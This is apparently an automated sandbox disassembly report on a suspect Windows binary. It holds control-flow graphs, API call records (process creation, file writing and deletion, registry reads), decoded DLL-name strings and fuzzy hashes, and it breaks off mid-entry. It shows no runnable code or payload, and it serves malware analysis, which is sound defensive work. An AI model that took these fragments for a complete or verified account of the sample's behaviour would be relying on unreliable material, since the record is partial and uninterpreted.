2818->2817 2873 871c1d-871c41 call 40a0c0 * 2 2821->2873 2822->2821 2827->2873 2828->2873 2890 871c43-871c4b 2873->2890 2891 871c4e-871c52 2873->2891 2890->2891 2894 871c54-871c5a call 40a0c0 2891->2894 2895 871c5f-871c6b 2891->2895 2894->2895 2899 871c6d-871c77 2895->2899 2900 871c7a-871c80 2895->2900 2899->2900 2902 871c86-871ca4 call 40a0c0 2900->2902 2903 871fea-871ffe call 40a884 2900->2903 2911 871d4c-871dae call 87039c call 40a0c0 call 40a884 2902->2911 2912 871caa-871cd2 call 40a0c0 call 407278 2902->2912 2913 872004-872020 call 40a0c0 2903->2913 2914 8720eb-8720fa call 40acb4 2903->2914 2958 871db0-871db8 2911->2958 2959 871dbb-871dc2 2911->2959 2942 871d37-871d46 call 40a0c0 2912->2942 2943 871cd4-871d32 call 4076f4 2912->2943 2928 872077-87209b call 40a0c0 * 2 2913->2928 2929 872022-872072 call 40a0c0 call 40acec call 40a0c0 * 3 call 40acec 2913->2929 2930 872161-872167 call 40a0c0 2914->2930 2931 8720fc-87211b call 40a0c0 * 2 2914->2931 2969 8720e1-8720e5 2928->2969 2970 87209d-8720dc call 40a0c0 * 6 2928->2970 2929->2928 2939 87216c-872177 call 40acb4 2930->2939 2931->2939 2964 87211d-87215f call 40a0c0 * 6 2931->2964 2965 872245-872261 call 40a0c0 * 3 2939->2965 2966 87217d-872186 2939->2966 2942->2911 2942->2912 2943->2942 2958->2959 2967 871ec4-871ee5 call 407278 call 40a0c0 2959->2967 2968 871dc8-871ded call 40aefc 2959->2968 2964->2939 3018 872266-87226f 2965->3018 2974 8721db-872220 call 40acec call 40a0c0 * 5 2966->2974 2975 872188-8721d9 call 40a0c0 * 3 call 40acec call 40a0c0 * 2 2966->2975 2997 871eea-871f27 call 87039c call 407278 2967->2997 2994 871e53-871e9d 2968->2994 2995 871def-871e51 call 4076e8 2968->2995 2969->2913 2969->2914 2970->2969 3065 872225-872243 call 40acec call 40a0c0 2974->3065 2975->3065 3004 871ea2-871ec2 2994->3004 2995->3004 3035 871f29-871f36 2997->3035 3036 871f38-871f42 2997->3036 3004->2997 3024 872271-87227c call 40a0c0 3018->3024 3025 87227e-872284 call 40a0c0 3018->3025 3041 872289-8724bb call 40a0c0 * 2 call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40aa98 3024->3041 3025->3041 3044 871f47-871f5c 3035->3044 3036->3044 3123 872517-872556 call 40a0c0 * 6 3041->3123 3124 8724bd-872515 call 40a0c0 call 40acec * 2 call 40a0c0 * 3 3041->3124 3050 871f70-871f8a call 87039c 3044->3050 3051 871f5e-871f6e 3044->3051 3057 871f8f-871fa0 3050->3057 3051->3057 3063 871fa2-871fa7 3057->3063 3064 871fac-871fb8 3057->3064 3063->3064 3066 871fc7-871fe7 call 40a71c * 2 GetShortPathNameW 3064->3066 3067 871fba-871fc4 3064->3067 3065->3018 3066->2903 3067->3066 3147 87255b-8725a9 call 40a0c0 * 6 3123->3147 3124->3147 3161 8725b6-8725bd 3147->3161 3162 8725ab-8725b3 3147->3162 3163 8725c3-8725cc 3161->3163 3164 8728aa-8728b3 3161->3164 3162->3161 3167 8725ce-872626 call 40a0c0 call 40acec call 40a0c0 * 3 call 40acec 3163->3167 3168 87262b-87266c call 40a0c0 * 4 3163->3168 3165 872ab1-872ab9 call 40a0c0 3164->3165 3166 8728b9-8728ce call 40aefc 3164->3166 3174 872abe-872af8 call 409d28 * 2 call 409cf8 3165->3174 3166->3174 3177 8728d4-872aaf call 40acec call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40a324 call 40a34c call 40aa98 call 40a0c0 * 4 3166->3177 3167->3164 3201 872672-872683 3168->3201 3202 87266e 3168->3202 3177->3174 3205 872685 3201->3205 3206 872689-8728a5 call 40a3c0 * 11 call 6ba5a8 * 3 call 40a3c0 * 4 call 40a494 call 40a9e8 call 40a0c0 3201->3206 3202->3201 3205->3206 3206->3164
                                                              APIs
                                                              • GetShortPathNameW.KERNELBASE(00000000,00000000,00000000), ref: 008716D5
                                                              • GetShortPathNameW.KERNEL32(00000000,00000000,00000000), ref: 00871FE1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: NamePathShort
                                                              • String ID: $ $ $ $ $ $,`_L$7$CsrClientCallServer$EP7MDL0M.DLL$EndPaint$FXSAPI.DLL$GetNamedPipeClientComputerNameW$IMJPDADM.EXE$Microsoft.Windows.Diagnosis.SDHost.ni.dll$PresentationFramework.AeroLite.dll$RtlNtStatusToDosErrorNoTeb$RtlWow64EnableFsRedirection$SafeArrayAllocDescriptor$SnippingTool.exe$System.ServiceModel.Internals.dll$System.Web.Mobile.dll$XamlBuildTask.dll$dpnhupnp.dll$dtsh.dll$ieinstal.exe$imscui.DLL$mcplayer.dll$msado15.dll$poqexec.exe$scecli.dll$vds.exe$wscapi.dll$wups.dll
                                                              • API String ID: 1295925010-2222364206
                                                              • Opcode ID: 5d2e70cf41b711fdf37418ce401aa14d087043d00f043388017297650e2e39ee
                                                              • Instruction ID: 801be07d2291bbea64fa8f8c54778c6b45d2fa94bc2df491ff9f6b9b40d7c6af
                                                              • Opcode Fuzzy Hash: 5d2e70cf41b711fdf37418ce401aa14d087043d00f043388017297650e2e39ee
                                                              • Instruction Fuzzy Hash: 53F2393491425ECFDB00EFA4C881ADEB7B5FF49308F108066D444B77A6D734AA5ACB66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040D074 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5190 40d074-40d09d call 409d7c 5193 40d0b4-40d0c9 call 40a928 call 40c8a8 5190->5193 5194 40d09f-40d0b2 GetModuleFileNameW 5190->5194 5196 40d0ce-40d0d6 5193->5196 5194->5196 5198 40d283-40d298 call 409c98 5196->5198 5199 40d0dc-40d0fd RegOpenKeyExW 5196->5199 5201 40d103-40d11f RegOpenKeyExW 5199->5201 5202 40d19d-40d1d7 call 40ce84 RegQueryValueExW 5199->5202 5201->5202 5204 40d121-40d13d RegOpenKeyExW 5201->5204 5210 40d1d9-40d20a call 406e70 RegQueryValueExW call 40a990 5202->5210 5211 40d20c-40d226 RegQueryValueExW 5202->5211 5204->5202 5207 40d13f-40d15b RegOpenKeyExW 5204->5207 5207->5202 5209 40d15d-40d179 RegOpenKeyExW 5207->5209 5209->5202 5214 40d17b-40d197 RegOpenKeyExW 5209->5214 5212 40d257-40d268 5210->5212 5211->5212 5213 40d228-40d252 call 406e70 RegQueryValueExW call 40a990 5211->5213 5217 40d272-40d27b RegCloseKey 5212->5217 5218 40d26a-40d26d call 406e8c 5212->5218 5213->5212 5214->5198 5214->5202 5218->5217
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D299,?,?), ref: 0040D0AD
                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D299,?,?), ref: 0040D0F6
                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D299,?,?), ref: 0040D118
                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040D136
                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040D154
                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040D172
                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040D190
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D299), ref: 0040D1D0
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040D27C,?,80000001), ref: 0040D1FB
                                                              • RegCloseKey.ADVAPI32(?,0040D283,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040D27C,?,80000001,Software\Embarcadero\Locales), ref: 0040D276
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: Open$QueryValue$CloseFileModuleName
                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                              • API String ID: 2701450724-3496071916
                                                              • Opcode ID: c16a4baa85a35aa069bdc9d48d9af1adabbe8df825a8c4347384d09cbe66599f
                                                              • Instruction ID: 784b775982057c7c0034e0750c3c3b6630d9eee3212a56f647cfdb8ae3a704e6
                                                              • Opcode Fuzzy Hash: c16a4baa85a35aa069bdc9d48d9af1adabbe8df825a8c4347384d09cbe66599f
                                                              • Instruction Fuzzy Hash: 8051E175E80608BEEB10EAD5CC46FAFB3ACDB48704F5044BBBA14F61C1D6789A448A5D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00873BF4 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 423COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5225 873bf4-873bf7 5226 873bfc-873c01 5225->5226 5226->5226 5227 873c03-873c33 call 40a0c0 5226->5227 5230 873e5f-873ebc call 40a0c0 call 40acec call 40a0c0 * 6 5227->5230 5231 873c39-873c5b call 40a0c0 * 2 5227->5231 5275 873ec1-873f1f call 40a0c0 * 4 call 4076f4 5230->5275 5240 873c5d-873c65 5231->5240 5241 873c68-873c6c 5231->5241 5240->5241 5243 873cc6-873cf1 call 40a0c0 * 2 5241->5243 5244 873c6e-873cc1 call 40a0c0 * 4 call 40acec call 40a0c0 5241->5244 5259 873cf7-873e5d call 40a3c0 * 5 call 6ba5a8 * 2 call 40a3c0 * 3 call 40a494 call 40a9e8 call 40acec call 40a0c0 * 2 5243->5259 5260 873cf3 5243->5260 5244->5275 5259->5275 5260->5259 5299 873f21-873f29 5275->5299 5300 873f2c-873f33 5275->5300 5299->5300 5302 873f35-873f56 call 40a0c0 call 4076f4 call 40a0c0 5300->5302 5303 873f5b-873fb4 call 4076e8 GetWindowsDirectoryW call 409e50 5300->5303 5302->5303 5317 873fb7-873fe1 call 40a0c0 5303->5317 5325 873fe3-874049 call 4076f4 5317->5325 5326 87404b-87409f call 4076f4 5317->5326 5334 8740a4-8740bb 5325->5334 5326->5334 5334->5317 5336 8740c1-8740d6 5334->5336 5338 8740ea-8740ef 5336->5338 5339 8740d8-8740e8 call 4076e8 5336->5339 5341 8740f4-87414b call 40a0c0 call 8736f0 call 40a830 5338->5341 5339->5341 5349 874170-8741db call 40acec call 40a0c0 * 5 5341->5349 5350 87414d-874158 call 871424 5341->5350 5367 8741dd-8741e5 call 40a0c0 5349->5367 5368 8741ea-8741f8 5349->5368 5353 87415d-87416b call 40a730 5350->5353 5353->5349 5367->5368 5370 874216-874227 call 40a0c0 * 2 5368->5370 5371 8741fa-874214 call 4076f4 5368->5371 5377 87422c-87429c call 40acec call 40a0c0 * 3 call 409ce0 call 409d28 call 409cf8 5370->5377 5371->5377
                                                              APIs
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,008741CB,?,00000074,00000000,0087429D,?,?,?,?,0000004D,00000000,00000000), ref: 00873F9C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: DirectoryWindows
                                                              • String ID: $AuthFWWizFwk.Resources.dll$F$LCMapStringW$PropSysAllocString$RtlIpv6StringToAddressW$SetDynamicTimeZoneInformation$TaskScheduler.resources.dll$ZwSinglePhaseReject$gpupdate.exe$icmp.dll$msdtctm.dll$twunk_16.exe
                                                              • API String ID: 3619848164-1532618243
                                                              • Opcode ID: acc7d45c5d09796f28b1fbf20f33f42f7064414b2dff55cd065bfb5ff4eefc6d
                                                              • Instruction ID: ba7d8b23c050632f8c4c162896acf9b3919604f37f090ebbf848f84c3faf45e5
                                                              • Opcode Fuzzy Hash: acc7d45c5d09796f28b1fbf20f33f42f7064414b2dff55cd065bfb5ff4eefc6d
                                                              • Instruction Fuzzy Hash: 76123934918219DFDB00EFA8D881ADDB7B5FB49314F1080AAE448F37A5D734AA55CF25
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0087E220 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 560fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5392 87e220-87e224 5393 87e229-87e22e 5392->5393 5393->5393 5394 87e230-87e27a call 409d9c call 40aa08 call 4235f0 5393->5394 5401 87e9c4-87e9ee call 40a71c CreateFileW 5394->5401 5402 87e280-87e28e 5394->5402 5413 87e9f4-87e9f6 5401->5413 5414 87ea8c-87eac6 call 409d28 call 409c98 call 409cf8 call 409ce0 5401->5414 5404 87e294-87e29d 5402->5404 5405 87e8b1-87e8c0 call 40acb4 5402->5405 5408 87e2f5-87e2fe 5404->5408 5409 87e29f-87e2f3 call 40a0c0 * 4 call 40acec call 40a0c0 5404->5409 5416 87e906-87e945 call 40acec call 40a0c0 * 2 call 40acec 5405->5416 5417 87e8c2-87e8e9 call 40a0c0 * 4 5405->5417 5411 87e976-87e9a8 call 40a0c0 * 4 5408->5411 5412 87e304-87e32b call 40acec 5408->5412 5409->5408 5477 87e9b5-87e9be call 40a71c DeleteFileW 5411->5477 5478 87e9aa-87e9b0 call 40a0c0 5411->5478 5435 87e331-87e342 5412->5435 5436 87e32d 5412->5436 5421 87e9f9-87ea16 call 40acec 5413->5421 5481 87e94a-87e971 call 40acec * 2 5416->5481 5483 87e8ee-87e904 call 40a0c0 * 2 5417->5483 5441 87ea18-87ea86 call 40a0c0 call 4076f4 call 40a0c0 call 40acec WriteFile CloseHandle 5421->5441 5438 87e344 5435->5438 5439 87e348-87e359 5435->5439 5436->5435 5438->5439 5447 87e35f-87e370 5439->5447 5448 87e35b 5439->5448 5441->5414 5457 87e376-87e387 5447->5457 5458 87e372 5447->5458 5448->5447 5466 87e38d-87e65a call 40a3c0 * 25 call 40a494 call 40a9e8 call 40a0c0 5457->5466 5467 87e389 5457->5467 5458->5457 5553 87e660-87e671 5466->5553 5554 87e65c 5466->5554 5467->5466 5477->5401 5478->5477 5481->5411 5483->5411 5555 87e677-87e8ac call 40a3c0 * 11 call 6ba5a8 * 3 call 40a3c0 * 4 call 40a494 call 40a9e8 call 40a0c0 call 40acec 5553->5555 5556 87e673 5553->5556 5554->5553 5555->5411 5556->5555
                                                              APIs
                                                              • DeleteFileW.KERNEL32(00000000,0000000E,0089B60B,00000004,0000000E,00000000,0087EAC7,?,?,?,?,0000001F,00000000,00000000,00000000), ref: 0087E9BE
                                                              • CreateFileW.KERNELBASE(00000000,C0000000,00000003,?,00000001,00000080,00000000,00000000,0087EAC7,?,?,?,?,0000001F,00000000,00000000), ref: 0087E9E1
                                                              • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000,?,?,?,?,?,?,0000001F,00000000,00000000,00000000), ref: 0087EA73
                                                              • CloseHandle.KERNEL32(000000FF,?,?,?,?,0000001F,00000000,00000000,00000000,?,0089A09E,?,FDE44ACE,?,?,0089B6AC), ref: 0087EA86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateDeleteHandleWrite
                                                              • String ID: $ $ $ $ $ $ $MsRdpWebAccess.dll$Sentinel.v3.5Client.dll
                                                              • API String ID: 656945655-3794073312
                                                              • Opcode ID: 6cb3a58435a4873310c62eeb0016106c44c5d8e3982b09b646eec5b19ab1beca
                                                              • Instruction ID: b977a249fb2273753ed32700527da0275b03f1a2078872caa0bd0b7dcb6d9bb2
                                                              • Opcode Fuzzy Hash: 6cb3a58435a4873310c62eeb0016106c44c5d8e3982b09b646eec5b19ab1beca
                                                              • Instruction Fuzzy Hash: 9C424E3490424E9FDB05DFA0C891BDDBBB6FF4A308F1080A6E544B7392D635AA59CF15
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0087518C Relevance: 21.8, APIs: 1, Strings: 11, Instructions: 806processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5601 87518c-8751f5 call 409d9c 5604 8752d0-875301 call 40a0c0 * 2 call 40acec call 40a0c0 5601->5604 5605 8751fb-875253 call 40a0c0 * 4 5601->5605 5621 875306-87530f 5604->5621 5625 875255-875296 call 40a0c0 * 6 5605->5625 5626 87529b-8752ce call 40acec * 2 call 40a0c0 5605->5626 5623 875345-875391 call 40a0c0 * 4 5621->5623 5624 875311-875340 call 40a0c0 * 2 call 40acec call 40a0c0 5621->5624 5656 875397-875399 5623->5656 5657 8754cd-875514 call 85e4bc call 4077e8 5623->5657 5624->5623 5625->5626 5626->5621 5658 87539c-8753f2 call 4076f4 5656->5658 5669 875517-87552c 5657->5669 5668 8753f4-875405 5658->5668 5670 875407-875467 call 4076f4 5668->5670 5671 875469-8754c8 call 4076e8 call 4076f4 5668->5671 5672 87552f-87559a call 4076f4 * 2 5669->5672 5670->5657 5671->5657 5683 87559c-8755c0 call 407278 5672->5683 5686 8755c2-87562a call 4076f4 * 2 call 4076e8 5683->5686 5687 87562c-87567f 5683->5687 5688 875684-8756a3 call 4076f4 5686->5688 5687->5688 5688->5669 5694 8756a9-87572e call 870fd8 call 87301c call 4076f4 5688->5694 5704 875730-875738 5694->5704 5705 87573b-87573f 5694->5705 5704->5705 5706 875745-87574e 5705->5706 5707 875828-875833 5705->5707 5710 875750-8757b8 call 4076e8 5706->5710 5711 8757ba-8757c0 5706->5711 5708 875835-875896 call 4076f4 5707->5708 5709 875898-8758ec call 4076e8 * 2 5707->5709 5718 8758f1-875910 5708->5718 5709->5718 5710->5711 5713 8757c2-875814 5711->5713 5714 875819-875823 5711->5714 5713->5714 5714->5718 5722 875912-87591d call 40a0c0 5718->5722 5723 87591f-875934 call 4076e8 5718->5723 5729 875939-875962 call 407278 5722->5729 5723->5729 5732 875a42-875a72 call 40acec call 40acb4 5729->5732 5733 875968-87597d 5729->5733 5744 875a74-875a7a call 40a0c0 5732->5744 5745 875a7f-875aa3 call 40acec 5732->5745 5735 87597f-8759e7 call 4076e8 5733->5735 5736 8759e9-875a3d call 4076f4 5733->5736 5735->5732 5736->5732 5744->5745 5749 875aa5 5745->5749 5750 875aa9-875aba 5745->5750 5749->5750 5751 875ac0-875c4a call 40a324 call 40a34c call 40a444 call 40a3c0 * 7 call 40a494 call 40a9e8 call 40a0c0 * 2 call 40a71c CreateProcessW 5750->5751 5752 875abc 5750->5752 5783 875c94-875ca5 5751->5783 5784 875c4c-875c8f call 4076f4 call 87301c 5751->5784 5752->5751 5785 875ca7-875cb7 call 4076e8 5783->5785 5786 875cbc-875cca 5783->5786 5784->5783 5785->5786 5789 875cd5-875cf0 5786->5789 5790 875ccc-875cd2 5786->5790 5793 875d63-875d7e 5789->5793 5794 875cf2-875d07 5789->5794 5790->5789 5797 875d80-875d89 5793->5797 5798 875de9-875df3 5793->5798 5794->5793 5796 875d09-875d5e 5794->5796 5796->5793 5799 875df8-875e35 call 40acec call 40a0c0 call 40acb4 5797->5799 5800 875d8b-875de7 call 4076f4 call 4076e8 5797->5800 5798->5799 5812 875e37-875e4a call 40acec 5799->5812 5813 875e4c-875e70 call 8744f4 5799->5813 5800->5799 5817 875e75-875ed6 call 4076e8 call 407278 call 409d28 * 2 call 409c98 call 409ce0 5812->5817 5813->5817
                                                              APIs
                                                                • Part of subcall function 00409D9C: SysAllocStringLen.OLEAUT32(?,?), ref: 00409DAA
                                                              • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,?,00876004,?,?), ref: 00875C42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: AllocCreateProcessString
                                                              • String ID: $ $,`_L$D$EhStorAPI.dll$K$Microsoft.Build.Utilities.dll$msnetobj.dll$netprofm.dll$nlscoremig.dll$wermgr.exe
                                                              • API String ID: 1156770731-3275516369
                                                              • Opcode ID: a9b1256ad7a3073b1a1e669d767d624d9c97eea52f4cf8dcbe49ca3b784a5162
                                                              • Instruction ID: ca8db5ffbe4782aa474916890c15ff25a00fd708b7f9831b0c757001128647e3
                                                              • Opcode Fuzzy Hash: a9b1256ad7a3073b1a1e669d767d624d9c97eea52f4cf8dcbe49ca3b784a5162
                                                              • Instruction Fuzzy Hash: E082E675908228CFEB00DF6DE981A8DBBF5FB0A314F10806AE499E7B61D734A945CF15
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00410820 Relevance: 13.8, APIs: 9, Instructions: 258COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6465 410820-4108ba call 410cd0 call 410ce0 call 410cf0 call 410d00 * 3 6478 4108e4-4108f1 6465->6478 6479 4108bc-4108df RaiseException 6465->6479 6481 4108f3 6478->6481 6482 4108f6-410916 6478->6482 6480 410af4-410afa 6479->6480 6481->6482 6483 410929-410931 6482->6483 6484 410918-410927 call 410d10 6482->6484 6486 410934-41093d 6483->6486 6484->6486 6488 410956-410958 6486->6488 6489 41093f-41094f 6486->6489 6490 410a1a-410a24 6488->6490 6491 41095e-410965 6488->6491 6489->6488 6497 410951 6489->6497 6494 410a34-410a36 6490->6494 6495 410a26-410a32 6490->6495 6492 410975-410977 6491->6492 6493 410967-410973 6491->6493 6498 410984-410986 6492->6498 6499 410979-410982 LoadLibraryA 6492->6499 6493->6492 6500 410a83-410a85 6494->6500 6501 410a38-410a3c 6494->6501 6495->6494 6502 410ad2-410ad9 6497->6502 6506 4109d3-4109df call 4101a4 6498->6506 6507 410988-410997 GetLastError 6498->6507 6499->6498 6503 410a87-410a96 GetLastError 6500->6503 6504 410acd-410ad0 6500->6504 6509 410a77-410a81 GetProcAddress 6501->6509 6510 410a3e-410a42 6501->6510 6516 410af2 6502->6516 6517 410adb-410aea 6502->6517 6512 410aa6-410aa8 6503->6512 6513 410a98-410aa4 6503->6513 6504->6502 6523 4109e1-4109e5 6506->6523 6524 410a14-410a15 FreeLibrary 6506->6524 6514 4109a7-4109a9 6507->6514 6515 410999-4109a5 6507->6515 6509->6500 6510->6509 6518 410a44-410a4f 6510->6518 6512->6504 6520 410aaa-410aca RaiseException 6512->6520 6513->6512 6514->6506 6521 4109ab-4109ce RaiseException 6514->6521 6515->6514 6516->6480 6517->6516 6518->6509 6522 410a51-410a57 6518->6522 6520->6504 6521->6480 6522->6509 6527 410a59-410a66 6522->6527 6523->6490 6529 4109e7-4109f5 LocalAlloc 6523->6529 6524->6490 6527->6509 6528 410a68-410a73 6527->6528 6528->6509 6530 410a75 6528->6530 6529->6490 6531 4109f7-410a12 6529->6531 6530->6504 6531->6490
                                                              APIs
                                                              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004108D8
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: c83b337babfb9c57bacd769e525762f8530e5949d6679a35cf9f9d6431fbfede
                                                              • Instruction ID: cc74c8f84af166c31608546b291aaa01305dc17240101f97f26116069fbfe04c
                                                              • Opcode Fuzzy Hash: c83b337babfb9c57bacd769e525762f8530e5949d6679a35cf9f9d6431fbfede
                                                              • Instruction Fuzzy Hash: BCA18275901309AFEB10DFA8D880BEEB7B5BF68350F14851AE505A7381DBB8A9C4CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004235F0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6532 4235f0-423609 call 40a928 GetFileAttributesW 6535 42365a-423664 GetLastError 6532->6535 6536 42360b-42360e 6532->6536 6539 423666-423669 6535->6539 6540 42367b-42367d 6535->6540 6537 423653-423658 6536->6537 6538 423610-423612 6536->6538 6541 423681-423684 6537->6541 6542 423614-423616 6538->6542 6543 423618-42361a 6538->6543 6539->6540 6544 42366b-42366e 6539->6544 6540->6541 6542->6541 6546 423620-423638 CreateFileW 6543->6546 6547 42361c-42361e 6543->6547 6544->6540 6545 423670-423679 call 4235b0 6544->6545 6545->6540 6552 42367f 6545->6552 6549 423644-423651 GetLastError 6546->6549 6550 42363a-423642 CloseHandle 6546->6550 6547->6541 6549->6541 6550->6541 6552->6541
                                                              APIs
                                                              • GetFileAttributesW.KERNEL32(00000000,?,?,?,00899A4F,FDE44ACE,?,?,0089B6AC,?,00000074,008B08D8,0089B6AC,00000000,00000074,00000003), ref: 00423601
                                                              • GetLastError.KERNEL32(00000000,?,?,?,00899A4F,FDE44ACE,?,?,0089B6AC,?,00000074,008B08D8,0089B6AC,00000000,00000074,00000003), ref: 0042365A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
